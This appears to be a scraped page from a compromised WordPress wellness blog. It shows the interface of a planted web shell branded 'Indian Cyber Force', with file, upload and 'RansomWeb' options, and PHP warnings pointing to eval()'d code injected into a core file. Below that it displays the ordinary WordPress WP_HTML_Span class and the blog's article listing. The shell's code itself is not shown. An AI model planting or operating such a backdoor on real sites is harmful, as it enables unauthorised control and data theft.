Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wordpress/wp-includes/html-api/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wordpress/wp-includes/html-api/class-wp-html-span.php
<?php
/**
 * HTML API: WP_HTML_Span class
 *
 * @package WordPress
 * @subpackage HTML-API
 * @since 6.2.0
 */

/**
 * Core class used by the HTML tag processor to represent a textual span
 * inside an HTML document.
 *
 * This is a two-tuple in disguise, used to avoid the memory overhead
 * involved in using an array for the same purpose.
 *
 * This class is for internal usage of the WP_HTML_Tag_Processor class.
 *
 * @access private
 * @since 6.2.0
 * @since 6.5.0 Replaced `end` with `length` to more closely align with `substr()`.
 *
 * @see WP_HTML_Tag_Processor
 */
class WP_HTML_Span {
	/**
	 * Byte offset into document where span begins.
	 *
	 * @since 6.2.0
	 *
	 * @var int
	 */
	public $start;

	/**
	 * Byte length of this span.
	 *
	 * @since 6.5.0
	 *
	 * @var int
	 */
	public $length;

	/**
	 * Constructor.
	 *
	 * @since 6.2.0
	 *
	 * @param int $start  Byte offset into document where replacement span begins.
	 * @param int $length Byte length of span.
	 */
	public function __construct( int $start, int $length ) {
		$this->start  = $start;
		$this->length = $length;
	}
}
wellwisehub – Page 3 Skip to content
wellwisehub

Latest Articles

  • Blog

    The Psychology Behind the Allure of Cosmetic Surgery: How Addictive Can It Be?

  • Blog

    Effective Methods to Elevate Your Mood Using Yellow Borneo Kratom

  • Blog

    Thriving with ADHD: A Guide to Living Your Best Life

  • Blog

    13 Effective Ways to Enhance Your Smile

  • Blog

    “Remarkable Wellness Perks of Nonalcoholic Beverages”

  • Blog

    The Mind-Body Connection: Harnessing the Power of Mindfulness for Healing

  • Blog

    6 Essential Practices for Maintaining Healthy Sleep Habits

  • Blog

    The Future of Dentistry: Trends and Innovations Shaping 2022 and Beyond

  • Blog

    The Valuable Advantages of Choosing Assisted Living

  • Blog

    Challenging Widespread Myths About Pain Management

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes